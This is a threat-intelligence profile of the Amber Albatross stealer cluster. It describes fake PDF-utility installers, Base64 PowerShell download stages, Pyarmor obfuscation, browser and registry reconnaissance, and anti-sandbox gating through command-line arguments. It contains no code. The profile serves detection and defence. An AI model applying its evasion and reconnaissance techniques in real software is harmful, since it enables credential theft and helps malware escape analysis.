Amber Albatross

Amber Albatross is Red Canary’s name for a stealer-like activity cluster delivered via installers masquerading as legitimate free software, often PDF-themed utilities, and associated with potentially unwanted programs including PC App Store and, to a lesser extent in 2025, Bit Guardian’s Win Riser. Red Canary describes the installers as code-signed but using rotating signer identities and changing utility names, with the chains leading to the same Pyarmor-protected final payload. The intrusion chain progresses through multiple stages and culminates in a PyInstaller executable with stealer capabilities. In 2025, operators updated later-stage tradecraft by adding Base64-encoded PowerShell commands to download and execute subsequent payloads and by migrating some second- and third-stage components from C++ to Go. One observed PDFast lure dropped upd.exe, which then used Base64-encoded PowerShell for retrieval and execution of later stages. Regardless of the initial delivery path, the final payload was a PyInstaller file.

The final-stage malware performs reconnaissance consistent with stealer behavior. Reported actions include WMIC-based hypervisor detection; enumeration of system manufacturer, model, and installed Windows updates; checks for antivirus and firewall products; discovery of browsers including Edge, Firefox, Chrome, Chromium, Avast Browser, and Brave; and attempts to access browser profile or user data directories. For Chrome, it checks HKLM:\SOFTWARE\Policies\Google\Chrome\CloudManagementEnrollmentToken to determine whether the browser may be managed by corporate policy, although the downstream use of that information is not determined in the source content. Some 2025 variants also queried uninstall registry keys to compile installed software and version information.

Amber Albatross incorporates anti-analysis and anti-sandbox measures. The downloaded installer and PyInstaller payload required specific command-line arguments to fully execute, consistently including --safetorun and --channel=<hex numbers>, which hindered behavioral analysis platforms from reliably exposing the last-stage payload. Red Canary also observed that the PC App Store installer behaved differently in sandboxes than in live telemetry, indicating anti-sandbox logic in the initial installer. The final-stage Python payload was protected with Pyarmor, encrypting and obfuscating Python bytecode and complicating static analysis.

Red Canary tracked Amber Albatross as a prevalent threat in 2025, ranking it first in April 2025 and second in July 2025, and also described it in first-half 2025 reporting as one of several internally named “color bird” threat clusters. The content does not attribute Amber Albatross to a named external threat actor, industry vertical, or geography.